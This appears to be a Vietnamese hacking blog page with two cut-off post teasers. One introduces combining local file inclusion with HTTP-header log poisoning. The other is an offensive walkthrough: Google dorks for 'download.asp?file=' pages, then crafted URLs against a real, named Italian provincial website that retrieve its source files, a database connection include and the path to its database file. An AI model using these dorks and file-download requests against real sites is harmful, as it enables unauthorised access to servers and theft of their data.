Combine “local inclusion + HTTP Header + access logging” attack /————————————————— Mục tiêu: Server Mức độ nguy hiểm: khá cao Mức độ phổ biến: có lẽ ko nhiều :-p —————————————————/ I ) Sơ lượt: Thông thường các web service thường có thêm chức năng ghi lại “nhật kí truy cập” của người dùng. Chức năng..
Read moreGoogle gõ keyword: allinurl: “download.asp?file=” allinurl: “dl.asp?file=” ra hàng loạt , lấy thằng này làm ví dụ nhé . http://www.provincia.so.it/download.asp?file= thêm default.asp vào http://www.provincia.so.it/download.asp?file=default.asp down cái file đó về mở ra thấy <!–#INCLUDE VIRTUAL=”/include/connettiDB.asp”–> thay tiếp vào đường dẫn vào http://www.provincia.so.it/download.asp?file=include/connettiDB.asp ồi tiếp tục down cái file đó về mở ra thấy percorsoDatabase=”/database/DBSito.mdb giờ thì..
Read more
Leave a Reply